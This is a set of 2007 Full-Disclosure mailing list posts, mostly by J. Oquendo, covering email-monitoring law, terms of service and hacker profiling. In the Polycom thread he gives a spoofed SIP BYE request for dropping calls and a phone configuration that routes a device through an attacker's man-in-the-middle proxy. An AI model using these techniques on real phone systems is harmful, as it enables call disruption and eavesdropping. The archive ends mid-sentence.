quite some time, or they embedded fiber taps INSIDE of a DoD
location (doubtable).

20 terabytes... I'll tell you what I think usually happens
with DoD and governmental sectors... Private corporations and
those in them slacking (http://cryptome.org/cg-leakage.htm).
Do I blame DoD, absolutely. I take a different view of this
altogether under a what if I was a contractor with no one
monitoring me...

Dictating to secretary:
We need another million for these uh golf... *scratch that*
for these vertically integrated, high end clustered reverse
path packet injection token based AES FIPS standardized
firewalls. Its cutting edge technology which guarantees
and mitigates against unauthorized intrusions.

The government should undertake a *real* method to secure
their infrastucture. Have it revamped by industry experts
and implemented by those same experts. Not some deep pocket
contractors who will skim so much of the money away and into
accounts in the triple borders. (reality... like it or not)

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Polycom hacking

2007-06-26 Thread J. Oquendo

Paul Schmehl wrote:
Is anyone aware of any work done in the field of hacking Polycom 
video-conferencing devices?  Or any known hacks for Polycom devices?



Hey Paul,

I have a modified version of Asteroid lying on one of my
servers that affected Polycoms, Snoms, Hitachi WiFi's,
and possibly a few others.

Offhand you could with high probability generate a hangup
DoS if you know enough about the network topology. E.g.:

  BYE sip:victim.phone.com SIP/2.0
  Via: SIP/2.0/TCP spoofed.pbx.server.com:5060
  Max-Forwards: 70
  From: Spoofed sip:spoofed.pbx.server.com
  To: VICTIM sip:[EMAIL PROTECTED]
  Call-ID: [EMAIL PROTECTED]
  CSeq: 1 BYE
  Content-Length: 0

You could take a look at Asteroid and target a Polycom
with it. I haven't bothered much with them. Cisco's
aren't vuln to much I've thrown at them yet.
(greetings [EMAIL PROTECTED]).

As for video (H323) check out voippong: You may be able
to intercept the audio streams out of the conference
depending on the setup. (Asterisk doesn't do H323)...
Maybe a combination of Yates, VoIPPong and others. HTH

http://www.enderunix.org/voipong/
http://www.infiltrated.net/asteroid/
http://www.voipsa.org/Resources/tools.php


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Polycom hacking

2007-06-26 Thread J. Oquendo

Paul Schmehl wrote:


Thanks.  I'm not that interested in DoSes, but I'm thinking that you 
could mget the entire contents, alter them to your satisfaction and 
then mput them.  Don't know how much memory these things have yet, but 
you ought to be able to iframe silent installs of malware, script the 
capture of all audio and video traffic from/to the device, etc.  Could 
be quite interesting.




On that level you could just use a MITM proxy: phone.cfg (removed html 
brackets)


xml version=1.0 encoding=UTF-8 standalone=yes
phone102
 reg
   reg.1.displayName=666
   reg.1.address=666
   reg.1.label=666
   reg.1.type=private
   reg.1.lcs=
   reg.1.thirdPartyName=
   reg.1.auth.userId=666
   reg.1.auth.password=666
   reg.1.server.1.address=original.server.ip
   reg.1.server.1.port=5060
   reg.1.server.1.transport=UDPonly
   reg.1.server.1.expires=1800
   reg.1.server.1.expires.overlap=
   reg.1.server.1.register=1
   reg.1.outboundProxy.address=man.in.the.middle.proxy
   reg.1.outboundProxy.port=5060
   reg.1.outboundProxy.transport=
   reg.1.ringType=2
   reg.1.lineKeys=
   reg.1.callsPerLineKey=

//  stripped the rest...

Where reg.1.server.1.address= points back at their PBX/H323
server. The problem with this would lie on the networking
side. Local without VLANs... Not a problem. Remotely, would
take some work but its doable. Polycoms are horrible when
it comes to doing network address translation and many set
them up in dirty DMZ's to get them to work.

Soundstations use the same XML files as the phones do. In sip.cfg:

outboundProxy voIpProt.SIP.outboundProxy.address= 
voIpProt.SIP.outboundProxy.port=5060 
voIpProt.SIP.outboundProxy.transport=DNSnaptr


Obvious entries to fill... Would work like this:

Registration and subsequent connection(s):
Soundstation -- AttackerProxy -- RealServer

With AttackerProxy looking at traffic you could recompile data,
block hosts from the conference, inject new participants, etc.


J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Squashing supposed hacker profiling

2007-06-19 Thread J. Oquendo
All female authors...  Your so called gender guessing mechanism is 
flawed either way you want to cut it. You could try fuzzy math based on 
theories to profile anyone on this list, but unless you have feasible 
and PROVEN without reasonable doubt, its all a guessing game bottom 
line. Anyhow back to security, sociolinguistics is not meant for this list.


According to Dr. Krawetz's Gender Guesser... 
(http://www.hackerfactor.com/GenderGuesser.html#Analyze)

http://girlygeekdom.blogspot.com/
Genre: Informal
 Female = 104
 Male   = 602
 Difference = 498; 85.26%
 Verdict: MALE
Genre: Formal
 Female = 116
 Male   = 239
 Difference = 123; 67.32%
 Verdict: MALE

REALITY: WRONG

http://www.darkreading.com/blog.asp?blog_sectionid=342WT.svl=blogger1_5
Genre: Informal
 Female = 442
 Male   = 555
 Difference = 113; 55.66%
 Verdict: Weak MALE
Genre: Formal
 Female = 364
 Male   = 570
 Difference = 206; 61.02%
 Verdict: MALE

REALITY: WRONG

http://invisiblethings.org/papers/joanna-talk_description-CCC04.txt
Genre: Informal
 Female = 218v
 Male   = 1186
 Difference = 968; 84.47%
 Verdict: MALE
Genre: Formal
 Female = 414
 Male   = 576
 Difference = 162; 58.18%
 Verdict: Weak MALE

REALITY: WRONG

http://www.techsploitation.com/2007/05/31/what-the-hell-was-i-thinking-about-green-libertarians/ 
(text by Sue Lange)

Genre: Informal
 Female = 210
 Male   = 481
 Difference = 271; 69.6%
 Verdict: MALE
Genre: Formal
 Female = 260
 Male   = 408
 Difference = 148; 61.07%
 Verdict: MALE

REALITY: WRONG

http://thelizardqueen.wordpress.com/2005/06/08/a-thoroughly-and-utterly-girly-blog-post-sorry-4/
Genre: Informal
 Female = 415
 Male   = 559
 Difference = 144; 57.39%
 Verdict: Weak MALE
Genre: Formal
 Female = 180
 Male   = 312
 Difference = 132; 63.41%
 Verdict: MALE

REALITY: WRONG


To be fair I had to go to the most feminine place I could think of, even 
then it was iffy.


http://groups.ivillage.com/motherdaughter/
Genre: Informal
 Female = 226
 Male   = 337
 Difference = 111; 59.85%
 Verdict: Weak MALE
Genre: Formal
 Female = 326
 Male   = 314
 Difference = -12; 49.06%
 Verdict: Weak FEMALE

REALITY: MAYBE THE AUTHOR HERE WAS FLAMINGLY GAY

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Squashing supposed hacker profiling

2007-06-19 Thread J. Oquendo

Steven Adair wrote:

 Amazing, you were able to find multiple instances where a script-based
 gender guesser was wrong?  This is more profound than the initial 
research

 itself.  I suppose I could post a series of 10 writings where it was
 correct, but what would that prove?  Did you try reading this from the
 same page:

 -


Yes I did read the page and I've also read through the obnoxious and smug
messages where this theory based hocus pocus voodoo bs is used for so
called hacker profiling. Quite frankly I could care less about n3td3v,
gobbles and whether or not they're one in the same. The purpose of my
message was point out that here is the quote on quote expert Krawetz
fingering individuals based on this same concept.

While vehemently insisting his method is not flawed I find it ironic that
he does not admit to it openly. Sure he can post it on a page, but how
about clarifying it openly. I can whip out some Chomsky documents and
offer arguments vis-a-vis and I can surely admit publicly when I'm an
ass I've done so plenty of times... Krawetz, you need to simmer down on
this hacker profiling. You may fool the kiddiots, but how do you know
you haven't been fooled.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Shady bastards - CONFIDENTIAL (Terms of Services)

2007-06-08 Thread J. Oquendo

Larry Seltzer wrote:

In luxembourg for instance mails labeled as PRIVATE or CONFIDENTIAL
  

are not allowed to be viewed by the company, ALSO as email. Write it in
the subject line.

Hey, don't read this. This isn't for you.


  

Too late...

This makes me wonder at times about the validity and arguments on these
signatures as well as so called Terms of Service agreements.

For anyone doing legal research, theory work, school work, I implore you
to read http://infiltrated.net/tos.html. Technically this Term of Service
may be legal... Moral? Absolutely not, but legal, I'm almost sure it can
be worded/re-worded to work. Does anyone even read their terms of service
when visiting a website, downloading software. I'm willing to say about
.0001 percent probably do. I'm willing to be 99.% either ignore them
or skim through them. Confidentiality signatures on email? Make zero sense.
THIS MESSAGE IS CONFIDENTIAL BUT GOING TO A PUBLIC FORUM. DO NOT READ
THIS MESSAGE IF YOU CAME ACROSS THIS MESSAGE FROM A PUBLICLY LINKED SEARCH
ENGINE. CLOSE YOUR EYES AND PRETEND IT DOESN'T EXIST.

By the way, after you read the TOS, don't forget to contact me afterwards
to make payment arrangements. On a more serious note, a TOS such as this
one in my opinion, would shoot down the entire concept of the legality of
a TOS and some of the claims some TOS' make.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Shady bastards - CONFIDENTIAL (Terms of Services)

2007-06-08 Thread J. Oquendo
For those who didn't bother reading, technically, I can find a legal 
loophole with the TOS I wrote. Some of you who visited the TOS page, 
ended up (based on the timing factors I see in access_log) ended up 
right on my front door. Technically, you are now bound to pay. This to 
me is a case for arguing over the validity and use of broad terms and 
semi-uselessness of so called e-contracts/e-agreements/e-signatures 
and the likes. I think companies love the ability to state this mail is 
confidential knowing damn well someone will likely not think about the 
extent of that statement, then turn around and twisting terms for the 
sake of saving face. Its a dual edged sword, love it or hate it. As for 
the previous thread and original comments regarding email... Personal 
work should be left off of any network not OWNED, OPERATED by YOU the 
individual. It's already established that corporate property whether a 
paper clip or email is property of the company there are no if ands or 
butts about it at present time.


In funnier matters... That's so broad it can't be considered legal... 
but usually will be (From the TOS page)



*13. LINKS*

The Service may provide, or third parties may provide, links to other 
World Wide Web sites or resources. Because Infiltrated has no control 
over such sites and resources, you acknowledge and agree that 
Infiltrated is not responsible for the availability of such external 
sites or resources, and does not endorse and is not responsible or 
liable for any Content, advertising, products or other materials on or 
available from such sites or resources. You further acknowledge and 
agree that Infiltrated shall not be responsible or liable, directly or 
indirectly, for any damage or loss caused or alleged to be caused by or 
in connection with use of or reliance on any such Content, goods or 
services available on or through any such site or resource. You also 
agree that upon visiting the Service, you will pay the Service the sum 
of $100.00 per visit regardless if you visited the Service willingly or 
unwillingly. This can, may or may not include indecent redirection to 
the Service.



How's that for obsoleting a law in one swoop. I wonder if I should call 
a lawyer and sue all the corporations who visited me this morning... I 
could use some Krispy Kremes, Starbucks, tuition at UConn, Satellite 
systems, etc.  ;)


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Fw: [IACIS-L] Statement by Defense Expert

2007-06-07 Thread J. Oquendo

[EMAIL PROTECTED] wrote:


So I take it that law enforcement computer examiners and prosecutors *do* have
the years of experience in software engineering and exploit construction and
use, to qualify them to translate a bit of data into forensic evidence of guilt?

  


Catch 22. This is why prosecutors often rely on expert witnesses who 
even then are lacking. One of the
things many omit in their methods of thinking when it comes to perhaps 
going to trial is the following,
and please take it very seriously... Will the JURY understand it first 
and foremost, secondly will the

jury even give a rats ass.

From experience, 1) the jury WILL NOT understand even 1/2 of the 
terminology nor concepts, analogies
you can throw at them. This works to the benefit of whichever side is 
willing to exploit the jurors.
Overwhelm them with so much technology they'll have to believe the 
accused is guilty. After all, why
bring in all of these *experts* (for the prosecution). Overwhelm them 
with so much technology to

counter the former experts expertise and throw in doubt... For the defense.

On the latter... While guilty until proven innocent is the American 
dream, it is seldomly practiced. If so
there would be no need for bail since the defendant is after all 
innocent. (Bottom line holding true to the
letter of the law... Not practical but this concept of innocent until 
proven guilty is flawed). Anyhow,
if one were to find themselves on trial this is what you SHOULD 
expect... You will get a jury of your
so called peers.. So let's define peer: Noun 1. peer - a person who is 
of equal standing with another
in a group. Your peers will never be in equal standing from a 
technological perspective period. For
one, it would take a miracle to gather a bunch of computer literate 
users for jury duty. Heck you will
likely find 0 even if one appears for jury duty, it is likely the 
prosecution will try to rid this person
from selection. Its not in their best interest to have someone fully 
technical on trial for a few reasons.
1) The juror might associate his experiences with the case being tried 
and taint an outcome based
on HIS experience, not the facts presented. Would be the main reason. It 
might not be in the best

interest of the defendant for the same reason.

No sir, your peer will consist of someone who's likely going to be 
computer illiterate, likely twice
your age, etc., they'll 1) be frustrated they have to go through jury 
duty and want to get things over
with to return to normal life. 2) They'll be looking like a deer in 
headlights trying to understand what
the hell an expert is talking about: SMTP is a protocol used to deliver 
electronic mail. This mail
consists of binary zeros and ones which when converted formed a 
corrupted gif image which caused
Microsoft's Windows Small Business Server to suffer a buffer overflow. 
Might sound like clockwork
to anyone here, but will sound Klingon to a juror. I could go on and 
on... But one should be able to

envision the possibilities of jurors being lost and irrate.

I may or may not do a write up based on my case, but that is likely 
going to irritate a lot of federal
agents and it will likely mean I will end up posting my case files 
online which will further piss off
more federal agents and perhaps place me back to square one. Who knows 
maybe I will discuss
this with an attorney beforehand. Lest I face the wrath of again 
breaking into an employer while
on an airplane. But hey... An expert can always be called in on my 
defense on how it would have
been impossible to spoof over the Atlantic Ocean... Then again, a 
counterexpert could show the
possibility of me hijacking satellite after satellite after satellite 
for said connection to leave a

teasing message saying... Hi I pwnd you for shits and giggles.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] You shady bastards.

2007-06-06 Thread J. Oquendo

H D Moore wrote:

Hello,

Some friends and I were putting together a contact list for the folks 
attending the Defcon conference this year in Las Vegas. My friend sent 
out an email, with a large CC list, asking people to respond if they 
planned on attending. The email was addressed to quite a few people, with 
one of them being David Maynor. Unfortunately, his old SecureWorks 
address was used, not his current address with ErrattaSec. 

Since one of the messages sent to the group contained a URL to our phone 
numbers and names, I got paranoid and decided to determine whether 
SecureWorks was still reading email addressed to David Maynor. I sent an 
email to David's old SecureWorks address, with a subject line promising 
0-day, and a link to a non-public URL on the metasploit.com web server 
(via SSL). Twelve hours later, someone from a Comcast cable modem in 
Atlanta tried to access the link, and this someone was (confirmed) not 
David. SecureWorks is based in Atlanta. All times are CDT.


I sent the following message last night at 7:02pm.

---
From: H D Moore hdm[at]metasploit.com
To: David Maynor dmaynor[at]secureworks.com
Subject: Zero-day I promised
Date: Tue, 5 Jun 2007 19:02:11 -0500
User-Agent: KMail/1.9.3
MIME-Version: 1.0
Content-Type: text/plain;
  charset=us-ascii
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Message-Id: 200706051902.11544.hdm[at]metasploit.com
Status: RO
X-Status: RSC

https://metasploit.com/maynor.tar.gz
---

Approximately 12 hours later, the following request shows up in my Apache 
log file. It looks like someone at SecureWorks is reading email addressed 
to David and tried to access the link I sent:


71.59.27.152 - - [05/Jun/2007:19:16:42 -0500] GET /maynor.tar.gz 
HTTP/1.1 404 211 - Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) 
AppleWebKit/419 (KHTML, like Gecko) Safari/419.3


This address resolves to:
c-71-59-27-152.hsd1.ga.comcast.net

The whois information is just the standard Comcast block boilerplate.

---

Is this illegal? I could see reading email addressed to him being within 
the bounds of the law, but it seems like trying to download the 0day 
link crosses the line.


Illegal or not, this is still pretty damned shady.

Bastards.

-HD

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  

Why would it be illegal if his former employer accessed his email using
this method. The information going to their network is considered their
property and they could do as they see fit. I could see if in your
email you included the almost always ignored disclaimer bs though:

THIS EMAIL IS INTENDED FOR THE RECIPIENT'S EYES ONLY. YOU WILL LIKELY
IGNORE THIS ANYWAY BUT USING THIS STUPIDLY CRAFTED CONFIDENTIALITY
DISCLAIMER, I WILL FILL MORE SPACE IN YOUR INBOX AND GENERATE MORE
POINTLESS BANDWIDTH USAGE ON YOUR NETWORK. IF YOU ARE NOT THE INTENDED
RECIPIENT READING THIS EMAIL AND OR ATTACHMENTS LINKS ETAL WILL RESULT
IN US PRETENDING TO HIRE A LAWYER AND DOING SOMETHING ABOUT IT.

I know how many times I've seen these listed with someone shooting
off information to mailing lists to do an oops f*** I sent that to
the wrong place... What are the options now? Sue everyone who read
it? Gash their eyes out. Normally if I were going to send out an email
that was *THAT* confidential, I personally do two things:

1) Call the person to make sure they're available to get it. If not
its not sent until they're ready.
2) Secondly if I have to post something on my website for someone's
personal viewing, I usually do something like:

$ echo theirname|md5
6a9c1e04624bcc81a84800b8aa10a1f1

Where the checksum becomes the file and I send them the link to the
file. What are the odds of someone finding that checksum... Highly
unlikely.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] You shady bastards.

2007-06-06 Thread J. Oquendo

Tim wrote:

Why would it be illegal if his former employer accessed his email using
this method. The information going to their network is considered their
property and they could do as they see fit.



This is a poor assumption.  See the Wiretap Act and the Electronic
Communications Privacy Act.  Of course these are just US laws, but it
seems this is the scenario we're discussing.

tim

  


Spare me and the list...

/ * SNIPPED * /
What about an employer's right to read e-mails as
they come in? As they hit the inbound server? ...
If the e-mail is not subject to the consent of
all parties, and one of the parties (either the
sender or recipient) lives in a jurisdiction
that mandates all party consent, then this could
be an unlawful interception under state law.
(Federal law requires only one party consent.)


http://www.securityfocus.com/print/columnists/412

*NOTE Federal Law*
/* END SNIP * /

Or search ... Nancy K. Garrity, et al. v. John Hancock Mutual Life Ins. Co

And no I won't bother with US v. Councilman

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] You shady bastards.

2007-06-06 Thread J. Oquendo

Tim wrote:


Spare you what?  If this is somehow off topic, please elaborate.

  
Spare me and the list legalities. One it is slightly offtopic then again 
this is fd so I retract.


That entire argument and any thread arising from what is legal and what 
is not is likelier

to be answered, dissected, studied on a legal forum.

Right, so under federal law, single party consent is sufficient.  If HD
didn't consent, and the former employee currently doesn't consent (i.e.
consent under the AUP or other agreements has expired), then it could be
illegal.  That, or if the person reading the stored communications is
not authorized by the company, then they would be personally liable.

  
Laws are not about what could or should. They're about what's written. 
In this case, he sent
an email to someone's former workplace. The worker was not there, the 
employer obviously
read the email. So the questions to ask should be 1) HD didn't give 
consent, did/does the
employer have something written to their employees which states the 
monitoring of email.

If they do, case closed there is the one party federal consent.

Secondly, did HD specify in his email any legalities of unauthorized 
reading. No.


Thirdly, you need to realize what you've stated and your 
misinterpretation of the law.

ECPA protects against INTERCEPTION. No interception occurred here, the mail
was delivered to a recipient.

Your conjecture that it's legal because the employer somehow owns the
communication or the networks it travels over is completely bogus. The
recipient is this email user, not the company.

  
The network is the company's and all of its communications into or out 
are property of the company.


http://www.redearthsoftware.com/email-monitoring-article.htm
Email auditing and email interception

A second distinction to make is the difference between email auditing 
(sometimes called email
monitoring), where email is checked after the actual transmission, and 
email interception (sometimes
called email filtering), where email is intercepted and checked during 
transmission.



Yup just looked this up.  This was thrown out because Nancy consented
under JH's email privacy policy.  I don't see how this conflicts with my
argument.

tim

  

Rinse and repeat this post and my comments..


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] You shady bastards.

2007-06-06 Thread J. Oquendo

Tim wrote:

As mentioned multiple times by multiple posters, but apparently eluded
your reading, the recipient's consent:

 A) May have never been given
 B) May have expired with the employment contracts
 C) May not apply at all if the monitoring party was not given


authorization by the company


You're basing your arguments on assumption...

A) I don't know ... Do you?
B) Most contracts have expiry dates on NDA's if signed. More then likely 
with a security company.

C) You don't know. I don't know.

We can infer from B) and C) that 1) recipient worked for a security 
company. 2) More than likely
signed an NDA or contractual agreement 3) Because they are a security 
company in place, they

*should have* had some form of policy in place detailing things.

So if 2 and 3 are correct, there is no law broken period. So re-posting:

/ *SNIPPET * /

Courts have held that the wiretap law required interception in 
transmission before - finding that
seizing of a computer gaming company's email, perusing a secure website 
under false pretenses,
reading an independent insurance agent's corporate email, installing and 
using tracking cookies,
and even hacking into a computer and retrieving email does not violate 
the wiretap law.

/ * STOP FOR A SECOND * /

See the last sentence?

/* SNIPPET * /
The courts have observed that to intercept something, according to the 
dictionary, is to stop,
seize, or interrupt in progress or course before arrival and therefore 
that a contemporaneous
interception - i.e., an acquisition during flight - is required to 
implicate the Wiretap Act.

/* STOP AGAIN */

See this last sentence?

/* SNIPPET */
Several court cases have upheld that checking email after transmission 
is legal (i.e. email auditing),
since it is viewed as no different than searching through a file in an 
employee's drawer.

/* END SNIPPET */

So before I go on... May I ask you how many times have you dealt with 
these issues or

anything like them in court? Care to ask me the same?

See: The Ordinary Course of Business Exception
http://www.law.duke.edu/journals/dltr/articles/2001dltr0026.html
http://www.theregister.co.uk/2004/07/05/close_email_wiretap_loophole/
http://thomas.loc.gov/cgi-bin/query/z?c109:S.936:

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] You shady bastards.

2007-06-06 Thread J. Oquendo

Tim wrote:

This definitely could apply in the case of the ECPA, but could get
dicey, since ordinary course of business is ill-defined and I suspect
would require some serious legal wrangling to argue.  Does this business
regularly read everyone's email?

In any case, whether they were legally permitted to monitoring that email
box or not, you really should work on your debate skills.  Attacking one
point by changing to another doesn't take the discussion anywhere.  The
offensive tone your initial emails took on was really unwarranted.
There's no need to make every thread a flame war.

tim

  

AGAIN... VERBATIM NOT MY *SUGGESTION/NOTION/INFERRENCE*


/ * PLAIN ENGISH VERSION * /
http://republicans.energycommerce.house.gov/107/Hearings/04032001hearing154/Lamb234.htm 


V. Electronic Communications Privacy Act

The Electronic Communication Privacy Act of 1986 (ECPA), 18 U.S.C.
2510-2522; 2701; was enacted to address potential privacy issues related
to the growing use of computers and other new forms of electronic
communications. It added provisions to the federal criminal code that
extended the prohibition against the unauthorized interception of
communications to specific types of electronic communications, including
e-mail, pagers, cellular telephones, voice mail, remote computing services,
private communication carriers, and computer transmissions. The Act also
identified situations and types of transmissions that would not be 
protected,

most notably an employer's monitoring of employee electronic mail on the
employer's system.

/ * END * /

Do you see or not see the sentence not be protected most notably an
employer's monitoring... EMPLOYER'S SYSTEM? Do you not see
the plain English wording unauthorized interception of. Now take good
note of this from someone who has been to court... Everything is as broad
as broad can be. Its purposefully done this way if you ask me and the
arguments come out AFTER the fact hence new cases being cited and
quoted. So literally the law states unlawful intercept and would not
be protected... employer monitoring so take these two things literally
assuming it were you in a court of law, you being the employer.

Defense: Client violated the ECPA act foo
Plaintiff: There was NEVER AN INTERCEPTION. The email was DELIVERED to 
his EMPLOYER'S SERVER


Point blank. Unless you cite another case where some company was
found guilty of snooping to argue this, point is moot. And I am not
just talking or inferring anything. I've posted ENOUGH information
to give you a clue about FACTS not inferences.

--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g'
Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ECPA Plain English 101 Employer vs. Employee

2007-06-06 Thread J. Oquendo

Cyberspace Law Institute

http://www.cli.org/emailpolicy/ECPA.html

/* BOTTOM LINE LEGALESE */

The special limitations on disclosure of private email, in ECPA, 
expressly apply only to those who provide electronic communications 
services to the public -- and an internal system provided by an employer 
to employees would not be so characterized.



The ECPA also permits access to private communication with
the consent of either the sender or the recipient. Employees
may (have to...) agree to such access (by authorized persons)
in the email policy of the company.

But even if there is no agreement the ECPA only prohibits
interception in real-time transmissions; email is usually
(or at least can be) stored and can be accessed by the system
administrator who usually will be the employer.

http://www.law.duke.edu/journals/dltr/articles/2001dltr0026.html
http://www.theregister.co.uk/2004/07/05/close_email_wiretap_loophole/
http://thomas.loc.gov/cgi-bin/query/z?c109:S.936:
http://email.about.com/library/weekly/aa080398a.htm



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] You shady bastards.

2007-06-06 Thread J. Oquendo

Dude VanWinkle wrote:

On 6/6/07, Larry Seltzer [EMAIL PROTECTED] wrote:
  

Really? I have gotten benefits and medical communications at my office


addy.

That stuff should be going to your home address, not least for this
reason.




Is should relevant? Is it a violation of HIPAA to read these
communications, even if I have these communications sent to my work
addy?


any lawyers on the list?

-JPwho's Draft was autosaved at 2:49 pm

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  


Medical and Workplace Privacy
http://lorrie.cranor.org/courses/fa04/work2.ppt

Permits identification of the individual (or creates a reasonable basis 
upon which to identify the individual)

45 CFR §164.501

Also see Office Snooping:

The information was learned in a routine audit of the company’s health 
plan for fraud, drug abuse, and excessive costs
No prohibition against employers making use of medical records in 
employment decisions

All co-employees had a “need to know”



--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato




smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Linux big bang theory....

2007-05-21 Thread J. Oquendo

Vincent Archer wrote:

On Sun, 2007-05-13 at 23:07 -0700, Andrew Farmer wrote:
  
This script really doesn't prove anything, though. All it shows is  
that a compromised machine can be difficult to impossible to clean  
properly - which has been known for a *long* time. Ken Thompson  
discussed a much cleverer one in Trusting Trust. It's also worth  
noting that this is in no way specific to UNIX systems. It's simply  
an unalterable fact that, once an attacker has had full access to the  
machine, it's possible for them to make changes which will allow them  
reentry at a later date.



I don't have (and I doubt anybody around here can) the proof to make
this a theorem, but it is a good postulate:

- It is impossible to prove the integrity of a computing system from
within the same system.

In olden days, this created the fundamental rules for systems like
Tripwire: place the signatures on non-alterable storage, run tripwire in
single user mode (ahh, the naive assumption that single user mode would
be safe enough).

Today, the preferred method of checking the integrity of a system
involves virtualisation of said system, and verification from the
hosting component of the hosted one. Or the hammer approach of erasing
the state of the system after use, and rolling it back to a proven
safe and stable one.

  

I've added a function to hide the script from showing up on Samhain
